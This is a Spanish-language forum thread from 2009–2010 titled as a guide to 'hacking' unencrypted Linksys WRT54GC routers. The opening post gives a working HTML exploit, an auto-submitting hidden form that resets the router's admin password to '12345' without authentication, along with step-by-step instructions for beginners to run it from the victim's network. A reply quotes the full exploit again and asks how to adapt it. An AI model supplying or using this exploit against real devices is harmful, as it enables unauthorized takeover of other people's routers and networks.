¡Cómo "hackear" un router Linksys WRT54GC no cifrado!

Iniciado por RedKnight, 3 Mayo 2009, 19:58 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

RedKnight

3 Mayo 2009, 19:58 PM
El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código [Seleccionar]
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info


Ahora sólo uso la cuenta con el nick BlackNightmare :p

genomma

#1
26 Junio 2010, 10:28 AM
Cita de: RedKnight en  3 Mayo 2009, 19:58 PM
El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código [Seleccionar]
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
 document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info




YO tengo un Linksys WRT54G seriviría este Script????   que modificaciones le tengo que hacer si mi direccion es 192.168.1.1????

Debci

#2
26 Junio 2010, 10:35 AM
Como ya dice el compañero, es la que se usa por defecto, lee un poco el codigo que aunque no sepas programar se sobre-entiende, que es Html tio...

Saludos
Imprimir
Ir Arriba Páginas1
Acciones del Usuario